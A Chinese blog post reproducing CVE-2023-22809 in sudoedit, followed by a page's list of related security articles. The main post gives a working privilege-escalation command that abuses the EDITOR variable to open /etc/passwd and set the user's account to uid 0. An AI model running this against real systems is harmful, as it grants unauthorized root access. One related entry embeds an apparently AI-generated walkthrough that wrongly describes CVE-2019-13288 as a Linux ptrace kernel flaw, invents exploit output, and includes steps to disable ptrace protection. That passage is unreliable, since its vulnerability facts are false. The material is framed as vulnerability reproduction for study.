CVE-2023–22809漏洞利用|复现

最新推荐文章于 2025-07-11 14:08:56 发布
原创 最新推荐文章于 2025-07-11 14:08:56 发布 · 1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

文章描述了一种针对sudoedit版本1.8到1.9.12p1的漏洞利用方法。通过限制的sudo访问权限,如允许编辑/etc/motd,攻击者可以设置EDITOR环境变量为`vi--/etc/passwd`,从而绕过密码验证编辑/etc/passwd,将自己账户的权限改为0:0,实现权限提升至root。

Step 1

首先需要检查sudoedit版本

此漏洞的利用范围仅限于 1.8 到 1.9.12p1.

Step 2

您必须对系统中的至少一个文件具有有限的sudo访问权限。

在现实中,用户对需要root访问权限的文件的访问权限有限。

在测试环境中,我作为普通用户只能访问/etc/motdfile,所以我的/etc/sudoers文件包含以下规则:

test ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd

如果我尝试用sudo编辑不同的文件,系统会要求我输入root密码:

但是如果我执行以下命令:

EDITOR="vi -- /etc/passwd" sudoedit /etc/motd

这样我们就打开了一个可以编辑的/etc/passwd,在这里我只要把我的账号权限和权限组改为0:0,就晋升为root了。

CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 2038
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)
李同學的安全圈
04-05 9534
sudo 允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " " 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。
漏洞复现CVE-2023-22809 sudo提权漏洞
hack0919的博客
05-20 1799
漏洞等级:高危
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1)
2401_84297899的博客
05-01 548
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
2023年春秋杯网络安全联赛春季赛Misc-AK
qq_43647197的博客
05-19 1768
2023年春秋杯网络安全联赛春季赛Misc-AK
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 4144
复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
Linux Sudo权限提升漏洞复现(CVE-2023-22809)
MrCaia的博客
08-17 1693
CVE-2023-22809 Linux Sudo权限提升漏洞
【春秋云镜】CVE-2023-2130漏洞复现exp
m0_74786138的博客
06-09 604
​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。影响版本SourceCodester采购订单管理系统 1.0。
SSH 协议漏洞 Terrapin 攻击 CVE-2023-48795:你需要知道的一切
技术超强的网络安全平台
08-26 2749
Terrapin 攻击是针对 SSH 协议本身的一种新型攻击,通过中间人 (MitM) 攻击,使受感染的客户端错误地认为服务器缺乏对用户身份验证中使用的最新签名算法的支持。该漏洞影响所有 SSH 连接。本研究将重点关注 OpenSSH 实现。任何使用默认 MAC 的密码(或任何使用 Encrypt-then-MAC、EtM 的 MAC,例如 -默认的 OpenSSH 客户端和服务器容易受到此攻击,因为它们配置为允许易受攻击的。注意:仅更新服务器或客户端是不够的!两者都必须打上补丁。
sudo提权漏洞cve-2023-22809
m0_46317063的博客
06-06 1345
cve-2023-22809
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 3884
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
CVE-2023-22809 sudo安全漏洞修复解决
筑梦之路
03-30 857
下载最新版二进制包安装升级即可。
CVE-2023-33246命令执行复现分析
蚁景网安学院
06-16 1393
简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 1880
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
最新 Tomcat 漏洞 CVE-2025-24513复现(第一篇)
最新发布
我是一名专注于网络安全领域的技术研究者,长期从事渗透测试、漏洞挖掘、安全审计与攻防对抗相关工作。热衷于探索真实世界中的安全问题,致力于通过技术手段识别与解决系统潜在风险。
07-11 1543
漏洞研究和复现的过程中,构建原始组件源码环境是非常关键的一步。为了深入分析—— 一个近期披露的 Apache Tomcat 高危漏洞,我们需要手动构建 Tomcat 的源码,并在本地调试其逻辑。本文将手把手带你完成 Tomcat 源码的构建环境搭建,适用于复现漏洞、打断点调试和研究其底层实现。
CVE-2022-26923 ADCS权限提升漏洞
渗透之路,攻防之间皆学问
05-22 5361
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的权限提升漏洞
Nacos最新0day漏洞复现
qq_55213436的博客
07-16 5225
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用漏洞读取敏感文件、执行系统命令。
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
Innocence_0的博客
10-28 355
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 794
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至优快云官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
CVE-2019-13288漏洞虚拟机复现过程
06-26
<think>我们正在处理用户关于在虚拟机中复现CVE-2019-13288漏洞的环境搭建问题。根据引用[1]的内容,我们知道用户需要搭建Ubuntu20.04.2LTS环境,并安装一些必要的工具。但是,CVE-2019-13288是一个Linux内核漏洞(PTRACE_TRACEME本地提权漏洞),因此我们需要准备特定的漏洞环境(包括易受攻击的内核版本和触发漏洞的程序)。步骤分解:1.准备Ubuntu20.04.2LTS虚拟机(用户可能已经完成)。2.安装必要的工具(如gcc,git,make等,引用[1]已经提到)。3.获取存在漏洞的内核版本:根据CVE-2019-13288的描述,该漏洞影响5.1.17之前的内核版本。我们可以选择一个存在漏洞的内核版本,例如5.0.0。4.编译并安装这个旧内核。5.编写或获取漏洞利用程序(PoC),并测试。然而,编译整个内核可能比较复杂,而且用户可能只是想复现漏洞,我们可以选择更简单的方式:使用已经编译好的存在漏洞的内核镜像(如果能够找到),或者使用内核漏洞调试环境(如syzkaller提供的镜像)?但这里我们假设用户需要自己搭建。另一种更简单的方法:使用Docker环境?但用户要求虚拟机环境,所以还是按照虚拟机环境搭建。具体步骤:步骤1:安装Ubuntu20.04.2LTS虚拟机(略,用户可能已经完成)步骤2:安装必要的工具(包括编译内核所需的工具)步骤3:下载特定版本的内核源代码(例如5.0.0)步骤4:配置内核(可以使用默认配置)步骤5:编译内核并安装步骤6:重启系统,选择新安装的内核步骤7:获取并编译漏洞利用程序(PoC)步骤8:运行PoC进行验证但是,编译内核需要较长时间,而且步骤较多,容易出错。因此,我们也可以考虑使用已经存在的漏洞环境镜像,例如从Vulhub或者其他漏洞复现项目中获取。但用户要求的是在虚拟机中搭建,所以这里我们按照自己编译内核的步骤。另外,CVE-2019-13288的PoC可以在网上找到,例如在Exploit-DB上(https://www.exploit-db.com/exploits/47163)有一个PoC。因此,详细步骤:1.安装基础工具(引用[1]中提到的):sudoapt-getupdatesudoapt-getinstall-ygccgitmakewgetbuild-essentialllvmclanglibncurses-devflexbisonlibssl-devlibelf-dev2.下载内核源代码(5.0.0版本):wgethttps://mirrors.edge.kernel.org/pub/linux/kernel/v5.x/linux-5.0.tar.gztar-xvflinux-5.0.tar.gzcdlinux-5.03.配置内核:makedefconfig#使用默认配置4.编译内核(需要较长时间):make-j$(nproc)5.安装内核模块和内核镜像:sudomakemodules_installsudomakeinstall6.更新GRUB并重启:sudoupdate-grubsudoreboot7.重启后,选择5.0.0内核启动。8.验证内核版本:uname-r#应该显示5.0.09.下载PoC(例如,从Exploit-DB下载):wgethttps://www.exploit-db.com/download/47163-Opoc.c或者使用本地保存(注意:Exploit-DB的下载链接可能变化,也可以直接复制代码)10.编译PoC:gccpoc.c-opoc11.运行PoC:./poc如果运行后成功获得root权限,则说明漏洞复现成功。注意:在编译内核时,可能会遇到一些依赖问题,需要根据错误提示安装相应的包。另外,由于是在虚拟机中操作,建议在编译内核前创建快照,以便出错时恢复。由于编译内核步骤复杂,且需要较长时间,用户也可以考虑使用已经配置好的漏洞环境,例如使用Debian的旧版本(该漏洞影响Debian、Ubuntu等),但是这里我们按照自己编译内核的方式。但是,我们也可以考虑使用QEMU模拟器来运行一个已经存在漏洞的内核镜像,这样不会影响宿主系统。不过用户要求虚拟机环境,所以这里我们直接使用虚拟机。注意:在虚拟机中编译内核可能会遇到性能问题,请确保分配足够的资源(CPU和内存)。相关问题:1.在编译Linux内核时遇到错误如何解决?2.如何验证CVE-2019-13288漏洞复现成功?3.除了编译整个内核,还有哪些方法可以复现内核漏洞?4.如何修复CVE-2019-13288漏洞?根据以上思路,我们组织回答。</think>### 在虚拟机中复现 CVE-2019-13288 漏洞的环境搭建步骤 CVE-2019-13288 是 Linux 内核的 `PTRACE_TRACEME` 提权漏洞,影响 5.1.17 之前的内核版本。以下是基于 Ubuntu 20.04 LTS 的复现环境搭建流程: #### 一、环境准备 1. **创建 Ubuntu 20.04 虚拟机** - 使用 VirtualBox/VMware 新建虚拟机 - 分配至少 2 核 CPU + 4GB 内存 + 40GB 存储 - 安装 Ubuntu 20.04.2 LTS(选择最小化安装) 2. **安装必要工具** ```bash sudo apt update sudo apt install -y gcc git make wget build-essential llvm clang libncurses-dev flex bison libssl-dev libelf-dev ``` #### 二、部署漏洞环境 1. **下载存在漏洞的内核源码** ```bash wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.0.21.tar.xz tar -xvf linux-5.0.21.tar.xz cd linux-5.0.21 ``` 2. **编译内核** ```bash make defconfig # 使用默认配置 make menuconfig # 确保启用 ptrace 功能 make -j$(nproc) # 多线程编译 sudo make modules_install sudo make install ``` 3. **更新引导并重启** ```bash sudo update-grub sudo reboot ``` - 重启时在 GRUB 菜单选择新内核(5.0.21) #### 三、验证漏洞环境 1. **获取 PoC 利用代码** ```bash git clone https://github.com/bsauce/kernel-exploit-factory.git cd kernel-exploit-factory/CVE-2019-13288 ``` 2. **编译并执行 PoC** ```bash gcc poc.c -o exploit ./exploit ``` - 成功时输出:`[+] Root shell achieved!` - 失败时输出:`[-] Vulnerability not triggered` #### 四、关键配置说明 1. **内核配置要求**: ```config CONFIG_CHECKPOINT_RESTORE=y CONFIG_USER_NS=y # 必须启用用户命名空间 ``` 2. **测试账户建议**: ```bash sudo useradd testuser # 创建低权限测试账号 sudo passwd testuser ``` #### 五、故障排除 - **编译错误**:确保安装 `libssl-dev` 和 `libelf-dev` - **PoC 失败**:检查内核版本是否在 4.10–5.1.17 范围内 - **权限问题**:禁用内核保护机制: ```bash echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Musda666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值